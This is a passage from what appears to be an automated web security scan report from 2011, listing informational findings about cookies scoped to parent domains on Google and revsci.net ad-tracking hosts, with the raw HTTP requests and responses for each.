Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 00:53:15 GMT
Set-Cookie: BriligContact=5d4ee69c-99de-419c-8ef9-9d7e686b3586; Domain=.brilig.com; Expires=Tue, 27-Aug-2041 00:53:15 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ti=12&sti=28&sts=1315096931625343&sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0
Content-Length: 0
X-Brilig-D: D=2992
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain

13.50. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=bnTyZwIf29xvOt4mQjEW6A; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Sun, 04 Sep 2011 01:23:13 GMT
Date: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=bnTyZwIf29xvOt4mQjEW6A; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

13.51. http://pix04.revsci.net/A11149/a4/0/0/123.302 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A11149/a4/0/0/123.302

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFec/C7nMQFlLKHV2YkRHDFZ6XU5/wAHYhBTtuzLxhsncWnsac5BtpDFUZr6/jfDVRBOK9JSmsXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kh6uj0O8yCeuP9QjUfquN0IT95gRWIOeIZ5VDzmd1TGncaIJy5Rmt72Y6sBk6eWHFT7d521/0QDr5cvwqaaeOq2sGW8QJkTmvIGA+gr1Jf7nK; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 01:14:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /A11149/a4/0/0/123.302?tgt=http%3A%2F%2Fsegments.adap.tv%2Fdata%2F%3Fp%3Daudiencescience%26type%3Dgif%26seg_id%3D%7Btrimsegs%7D%26add%3Dtrue HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; rsi_segs_1000000=pUPFOMPC7nMQVv0bea5BqwmbRK+MVkRJAbeHbXhI9gQ4O3XY0n8gIQtYr8iWg2RZvh/nqedFjTikWJN1Ce1I20XZputsNYD8PRldhSQAgu3S781lzRP/7kn26cuKgM1KT5NUGEwNTM9smvMFtEf0ZLVTC0b7aBgzCg7Xur7v1rk70L8ih1N/YsuwCfoGn7sf5fgIfSAzMGQGLY+A6oofsCAXph2yry3ZEDY5O7XBeBJ7kKXTPQ==; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFec/C7nMQFlLKHV2YkRHDFZ6XU5/wAHYhBTtuzLxhsncWnsac5BtpDFUZr6/jfDVRBOK9JSmsXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kh6uj0O8yCeuP9QjUfquN0IT95gRWIOeIZ5VDzmd1TGncaIJy5Rmt72Y6sBk6eWHFT7d521/0QDr5cvwqaaeOq2sGW8QJkTmvIGA+gr1Jf7nK; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 01:14:02 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://segments.adap.tv/data/?p=audiencescience&type=gif&seg_id=&add=true
Content-Length: 0
Date: Sun, 04 Sep 2011 01:14:01 GMT

13.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFOE/F7gMQlrWdI00GmV2emY3QHv3DVg9B02LswZhakqVFftDs8Pd8XH9p7LJOwoP+gn4nNPri7ZTBvzApv7OPHPbRT1bOas9RWPwMputF602mB2D/7kn26cvKk8znLSqrkUfWnvvP/lQ7FJEAIi/uZ65/PObD+9k+Oks/AIbF67IR+HUIyHvOjU5HxCf9/9FI4F5DDnZWHU17vK5Xoqw1LgsRAwEDgjYhNKRDbKw8H+dTTWvNOLItf3a3CQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/
udm_0=MLvvMFMKYS5nPP4Rh+RGdnVVfFLxImPxWtD/sSVBkUFuSVanMFZpxQEc1dOl8wQX2gnya+3mcehkXLGTZv63Ub6D9Scw0RQb9vO+dM1CYSMm2RgJR1pSPQrPXEAjgiZoGswHX3ZjXHJHQxILRB6aywlWRAagr3+2K0sZ34/KulifkMfi4M9A3Sb6oDvAOEIz+kkvbPXTK9bEp5NP5ywNoNK+eIydxrqbHn6mOAdSeyQnFScThc8RoVZTQXh4pgw82W9ufamncbhh4tM4gRg8KhHEp5ae+NhCfyVpecM3np8H3h3kP4GuQonWNrrnLFv5o+P3bfaxlgye8PHmExPGqkXg30EqL+e6/w62uwo9kDJAODlrBK6f0tXkr71Q3vU831SSjKTupuIueEMZUkYAgS40MDcps9VLym2lj19mm6Qx0EyIt9JfcJAJoxn5lpUZ7b0u78vQhKJTXv4nwq8BCTdEcNvUBaYLWpJ0baJQ8E+tthrXQ48BigEQacf2gCM0PFOSNC8tGdDl1Lv9umcEbOFJd00oX2YeMiDnoPHO0D7/AAOEK9Y62dhDQfMyl4eUItxwEO7/p//8m6lI2QIkKeeSuxO1De0DAS2+8ebTmSaijo0MHpyYmplGc+EYBgN8I16+69gEyHDV/T5auQ8yV5WFnctxm0xyWwrTQ/YfIP2KVQITxxTGpMdelRXGJDYNKQ7SxeZODswAyaET49xlCcfccg==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=MLv38CMpYS5rpr4czGDsuuqBPWf7KsMz01fKtT610i1pdlCheRf6b9kCVd3v9r3st7cmM0gIRSd7MpaC8NXsZUwtae0IloLFJap/gZi76IGx+cyWgZ6+vZaNGDMnSvgxwwhKNMJOy6lD9QmxLmp5iUQx8Af2+nfHWRw3Tj+fEjeIT1gLVR4j9TpLtxLXx2KLFlkUS2oKqH7ZtWjiRcE89QZ6mDaSm3BdIs7JxqL4J1x1tvBVvnDY7X40IzE2MKgmkLUHZTKwvj5hcWXCYa8pT1xp1DSpkY7CKKmpKlZtSUGfCVTG17N0zTfBLnW6UzMK8Bk6MPI6U8mgMhL95YKdi9yTeJBsRuAlTc/5no/9OF2E1L1sK1fBlux5bis8Nfd68xeTjr/YrzZkSITtmhZcZTrCNMbqKvmHAl1zL0HcIWPYj4HUgtYCzQxBIcl1C+YNyjTcxwRSsPWSCGeeLiADblyxYX895xGaqMMnUz9A8aKCiYIrasqB5hZsEOOBN7qCBIM/ZuyWnsX9TJhRbKUT9pyWYSVlSgGjm812lLduhcCgqtQCBUaCKQStvRjyoEWxqBf43bWAGEcjB2I29FHX46LC3nvj3+dyvlUL3+cRf2Iz97EyGefayWmbEtWoPl8J+oNA7FQfw0/UyOJf0HeKqhQonhcTgoCjrIni/zz6qEMlbyAqQuvk/IcxeDzUj+6d0ebI81e3TsEXs765NURRog8Fct/gRayZz+RnKF+AbF6ZLn4sa0KYqcY+t6xXsxxULAj1hsqmAsSo7K0BzEGzafTMub7EjOe5zRiXelJiWvjCvbJTOyYp4Oxc3A+SpOIqlGa/Unt6ZH5WOhmdktwqaC3rB5O9Oi82i5FALQR+NfEWeQNPbA==; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_LVUM="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYNfmdo4272ogCIBDOimYv4fEg9zw6j4jrFvDEmjHCoJT8voGTLmJnWzvbs49kTDrTctUCdQ99o84r443+VA4/6HCW3/BRNAYl5aPcaD1s59ilv5lMNITjZH4Wthbsni1n3csqYpkQ4kjzeD9Ag7v0g8pQ43kHlf0zkVU4="; rsi_us_1000000="pUMd5c2g/xMQ7V5vYJPD0C371ly7qzCPyctfVMmoNfzhcSKV0v4e66ymwRf8QcU3FV+IGpm+3PedGzrOT9lT9EoUsFckBCjXgdMoWcJ+ZBwmTcmvYnaIAWGslXxRlOjyV0yAeH49RvV5wpBw+PAcIGEfuZuc4tqocczTORX1uqAjdGan1Zaz6sFHSHyFpNOFKP4PyXx28q95yfVkwA6b4qOX7Qc/kZO/twa3DHKJn5CXUk3ImbspngbAOY9OdE7rAkDDg5t1zwRApTn5BfEfw18PzHYXKtffbkxgQ0XCDWeN8jEgjJJzuv9+0n+IYqBjcIzZfohkqL9IJ8uYTYwtcmjZ+TxfgB7M4ZuMzhISw1WRpG2pk+vmwGRBalwrga+00ZPwjENAkddASB+BhUm04whwG893vWsR1EW2L7I5jNtUceNsv45LeKWq7ai/w/VEhZdtmHFBUtIprPiiLHiGV/zN2GoM2NFYcX+rvNVUAvwn9Myf9l5i3NSWCOLLAtUiglf9v3Vjb2IND7oIUGeYEBRF5SNUykPWjx86I+sRb2eVcjbmdzKfvPLHUwbMmTrpBft+K/R9YYwbnJeFrG9sMBOtPPcbM/kOqkWCZYdHTpMq5r0zjIc9/Ww6wp88lWDwK9Ig9wHsesg09/38LCdrLOpYfvQtW/b9cJ+KTbvbPE+upEdF+jnq8pFghFI13g2TX8KOxFCmrDyPP+K+WKhMydhjMeUBltkClF9H3/lk9/yMn+vX0MN0jgjYIA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOE/F7gMQlrWdI00GmV2emY3QHv3DVg9B02LswZhakqVFftDs8Pd8XH9p7LJOwoP+gn4nNPri7ZTBvzApv7OPHPbRT1bOas9RWPwMputF602mB2D/7kn26cvKk8znLSqrkUfWnvvP/lQ7FJEAIi/uZ65/PObD+9k+Oks/AIbF67IR+HUIyHvOjU5HxCf9/9FI4F5DDnZWHU17vK5Xoqw1LgsRAwEDgjYhNKRDbKw8H+dTTWvNOLItf3a3CQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvMFMKYS5nPP4Rh+RGdnVVfFLxImPxWtD/sSVBkUFuSVanMFZpxQEc1dOl8wQX2gnya+3mcehkXLGTZv63Ub6D9Scw0RQb9vO+dM1CYSMm2RgJR1pSPQrPXEAjgiZoGswHX3ZjXHJHQxILRB6aywlWRAagr3+2K0sZ34/KulifkMfi4M9A3Sb6oDvAOEIz+kkvbPXTK9bEp5NP5ywNoNK+eIydxrqbHn6mOAdSeyQnFScThc8RoVZTQXh4pgw82W9ufamncbhh4tM4gRg8KhHEp5ae+NhCfyVpecM3np8H3h3kP4GuQonWNrrnLFv5o+P3bfaxlgye8PHmExPGqkXg30EqL+e6/w62uwo9kDJAODlrBK6f0tXkr71Q3vU831SSjKTupuIueEMZUkYAgS40MDcps9VLym2lj19mm6Qx0EyIt9JfcJAJoxn5lpUZ7b0u78vQhKJTXv4nwq8BCTdEcNvUBaYLWpJ0baJQ8E+tthrXQ48BigEQacf2gCM0PFOSNC8tGdDl1Lv9umcEbOFJd00oX2YeMiDnoPHO0D7/AAOEK9Y62dhDQfMyl4eUItxwEO7/p//8m6lI2QIkKeeSuxO1De0DAS2+8ebTmSaijo0MHpyYmplGc+EYBgN8I16+69gEyHDV/T5auQ8yV5WFnctxm0xyWwrTQ/YfIP2KVQITxxTGpMdelRXGJDYNKQ7SxeZODswAyaET49xlCcfccg==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:43:12 GMT

GIF89a.............!.......,...........D..;

13.53. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFeU/F7gMQlVNWye4WT+7FVcYUPosPyzLn7mCqBpJakqVFftDs8Pd8XH9p7LJOSgsdxA97zNjRBumoSHminWw7EeAr70CWFMXT8ZaoCiV1MiuKvp5QCBbboY8YnCOuCjLvt0/4MIf99AC7ZSY0w5C77Q6CoOArG5YEiepgrvMcmFjpSrPze/ZFTj8/JoWhtW9419+hEUht9d1eloKUu9z3BV+2PuPu; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
udm_0=MLv/9FEJUSpn5l6pVFGFtoFPcNiZQXEmRfNYGCemmjfgrpYXr01sQ9tiT8EX00BRV94CRgAU+Cx+A1UyfYZNMCAyWVxgaMJPGkf8TFIlYXlki3Za8SZrHQcbAAHtzBKuHN1WnZO/FADdFtbQ4tTcDTv+/Xlt+BhYtDIVpaeByA0iypN5Q1/ovDhNl5rC75OYkwLvQ+PNALghcwtRNb5XQkE/e736rwI59LV+Lxcr6hqYtoSa0Y7NmcqmxdooVTFg8d9OkXAe/nA0Pv09oobrkR1sPhh4bpWCMXXgcnIXJhRZL+WmuuhUNICfUwoHrSnfNd7INRqbEKlrkyI4ranyBdGGDnfpMhZ4d70tSL78Wzix96AC37O8TjtMhOyNvZtMEqM3Vu430adx2g6NcgghcyBCd/4ZD11sEyYhtAVGsixJ9D/eNU5p5xq8uXL62d3u/+3GJw/j/OmHcrDVGO1Ets+Ml/G2x8IfPGrQ6BXlnVPkZ0Yb0DLjAe/Mlto3nTqXnqLZJtNb+TCCZgNCcA4D1t8TtjhkqPedaX74wLR/4PIrwHSr9l/ZtT0andQyxYusw/hmtZVIFFrzRGki+nKKU+DfZzsBVISF3gY636fNNZGUnxnT+qoUbza+WQ5nu4y+xgvM3rX0KCpaI9y4j+M2HLlBBe0Y66nyTZhgnberGlUfyGAREOYcmLefKqQ8vnPRH34tstpiLW8fVZymfgXFnOrHvEfIkajgy5PFOicYxMmRwPaxj3cxb/4LuZmv/rC5Pk0o5fWR77B8xzpw4B3wE0nnO1GT7gpH7oiyCu3p7BKVkMayCiP7wU3LSaSVJMh6rwvMlxBnhqJQ7I8o2/N/s/zBI3sOWJ1RjDG/QWxgo2bY9PHDrgr9EMCvN2YESZZxIO3sQnvBDpmvkmA9SYEb4uffYOulKcagBZoDKaBk3xg90muYx0Yn5GskyQmwvnxYGwPebHzI8jqsMy3/N5N7mdMOlZs+AzRNfDK8eQetzUS3jUEu7evMgTUnNpAw5xNxCd7mkwJCzD3R2FhhUMXPIJpvkl5LUakIjQnacYISFbBXQ5VKvjBs3ArBfhOvf1PaJ7iQIYF9u8LFr5BnIQIb+A6fps+n3volzB+ugnGU8HH1EP+e0NI1L2C42QJVScul2+QNW4lkxtS0gX5W1qspjaE+hy9HSkd9; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="; udm_0=MLvv8FEJoS9npx4Ednq9YMBs9UFoa0U2h9b6OXFScmalI3t4IfxJSN67yaGjig+eWmkqtj8SzXF4+FJSFwnD3jITRGB3M0Yx9P0nIeSjmJWTu+2Ant8jI058EvH0wiyEJabVhVaTXVQSXwV7CHWoAqOobVyK81IZLoWuX5iT7y3M8ScOMJrBsHg8KYeni5z/E6hkDffwQLF8iPG05ZYtUA0alpaWPIsfSZP09AwQLM4/SgJ1qogzpZ0jrN1odBAf2GHOabJZ2/4wM0E9KajR5b9r7hs8/D8TnAx33g4xWC9OBwrBjlk/nj/WE9jC9AL72Q1kBbW0aVwbUxDtsLsy72TezNYbA9wMR2b4t22vECwG52fwQCCp7YspVUnDU7ZUV1l52zdrMb4YjTBOPHikYQIi6KiPQYghVDCclLvvsPXKTwn7ANcw4uw1QyIILtMe8Q/lzIaPJ05O3JfbFWzgRbe0YqmmAFOP4r8JBDXmcRXJm9lth61wKthFl0nuld0zu0mX5KsXzUQHvihVAnP3goULD8pxYQk0WTzgXLF0RvPvH9Tw2lObtmDphrk7b9pbmIm86p9+zbQ+4UQg+3N4Z/k2caDp4CkFmcHwEglLKqKmuOJUrD9WrWEf

Response

HTTP/1.1 200 OK
